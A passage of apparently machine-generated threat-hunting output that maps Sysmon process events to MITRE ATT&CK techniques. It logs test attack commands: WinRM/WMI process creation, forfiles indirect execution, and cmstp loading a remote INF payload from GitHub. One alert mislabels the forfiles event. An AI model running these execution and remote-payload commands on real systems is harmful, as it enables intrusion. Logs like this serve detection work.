</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.878709Z"">
</TimeCreated>
<EventRecordID>4994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.763</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-0010EF858E00</Data>
<Data Name=""ProcessId"">264</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
<Data Name=""ParentProcessId"">1580</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cscript.exe ) through command line ( cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;} ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.878709Z"">
</TimeCreated>
<EventRecordID>4994</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.763</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-0010EF858E00</Data>
<Data Name=""ProcessId"">264</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
<Data Name=""ParentProcessId"">1580</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1564436075.878709,2019-07-30T01:34:35.878709+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; qc -q) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm qc -q) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.838188Z"">
</TimeCreated>
<EventRecordID>4993</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.663</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-00102F7F8E00</Data>
<Data Name=""ProcessId"">3224</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cscript //nologo &quot;C:\Windows\System32\winrm.vbs&quot; qc -q</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">747F3D96-666B-5D3F-0000-001051638E00</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c winrm qc -q </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;} ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.337716Z"">
</TimeCreated>
<EventRecordID>4991</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.285</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
<Data Name=""ProcessId"">1580</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;} ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.337716Z"">
</TimeCreated>
<EventRecordID>4991</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.285</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-001033648E00</Data>
<Data Name=""ProcessId"">1580</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=&quot;calc&quot;}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436075.337716,2019-07-30T01:34:35.337716+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm qc -q ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:35.313087Z"">
</TimeCreated>
<EventRecordID>4990</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:35.246</Data>
<Data Name=""ProcessGuid"">747F3D96-666B-5D3F-0000-001051638E00</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c winrm qc -q </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1553029831.815313,2019-03-20T01:10:31.815313+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /delete /f /TN &quot;Microsoft\Windows\Customer Experience Improvement Program\Uploader&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:00:01.539020Z"">
</TimeCreated>
<EventRecordID>1966503</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:00:01.529</Data>
<Data Name=""ProcessGuid"">365ABB72-5851-5C91-0000-00107D050A00</Data>
<Data Name=""ProcessId"">2716</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\schtasks.exe /delete /f /TN &quot;Microsoft\Windows\Customer Experience Improvement Program\Uploader&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=2003E9B15E1C502B146DAD2E383AC1E3,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-5851-5C91-0000-0010E1030A00</Data>
<Data Name=""ParentProcessId"">2772</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wsqmcons.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\System32\wsqmcons.exe </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1564436070.807635,2019-07-30T01:34:30.807635+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:30.685271Z"">
</TimeCreated>
<EventRecordID>4988</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:30.462</Data>
<Data Name=""ProcessGuid"">747F3D96-6666-5D3F-0000-0010AE068E00</Data>
<Data Name=""ProcessId"">1464</Data>
<Data Name=""Image"">C:\Windows\System32\forfiles.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">ForFiles - Executes a command on selected files</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6666-5D3F-0000-001016F78D00</Data>
<Data Name=""ParentProcessId"">2244</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1553029201.518992,2019-03-20T01:00:01.518992+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:58:44.237867Z"">
</TimeCreated>
<EventRecordID>1966501</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:58:44.187</Data>
<Data Name=""ProcessGuid"">365ABB72-5804-5C91-0000-001044DE0900</Data>
<Data Name=""ProcessId"">2456</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-57FB-5C91-0000-00104FD40900</Data>
<Data Name=""ParentProcessId"">2128</Data>
<Data Name=""ParentImage"">C:\osk.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\osk.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436070.258082,2019-07-30T01:34:30.258082+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:30.237042Z"">
</TimeCreated>
<EventRecordID>4986</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:30.221</Data>
<Data Name=""ProcessGuid"">747F3D96-6666-5D3F-0000-001016F78D00</Data>
<Data Name=""ProcessId"">2244</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436065.269897,2019-07-30T01:34:25.269897+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:25.202954Z"">
</TimeCreated>
<EventRecordID>4983</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:25.180</Data>
<Data Name=""ProcessGuid"">747F3D96-6661-5D3F-0000-00107AB88D00</Data>
<Data Name=""ProcessId"">6428</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
